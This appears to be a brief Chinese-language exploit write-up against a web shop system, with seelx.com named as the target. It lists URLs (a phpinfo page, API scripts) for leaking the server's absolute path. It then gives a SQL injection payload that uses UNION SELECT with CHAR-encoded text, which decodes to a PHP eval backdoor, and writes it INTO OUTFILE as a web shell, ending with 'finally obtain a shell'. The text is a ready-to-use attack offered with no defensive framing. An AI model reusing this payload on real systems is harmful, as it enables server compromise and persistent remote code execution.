第一步需要想办法得到目标站点的绝对路径
如:
http://seelx.com/install/svinfo.php?phpinfo=true
http://seelx.com/core/api/shop_api.php
http://seelx.com/core/api/site/2.0/api_b2b_2_0_cat.php
http://seelx.com/core/api/site/2.0/api_b2b_2_0_goodstype.php
http://seelx.com/core/api/site/2.0/api_b2b_2_0_brand.php
http://seelx.com/?passport-signup.html
发送消息
http://seelx.com/?member-send.html
利用代码:
seelx.com’ union select CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile ‘绝对路径/sanlu.php’ sanlu
最终拿到shell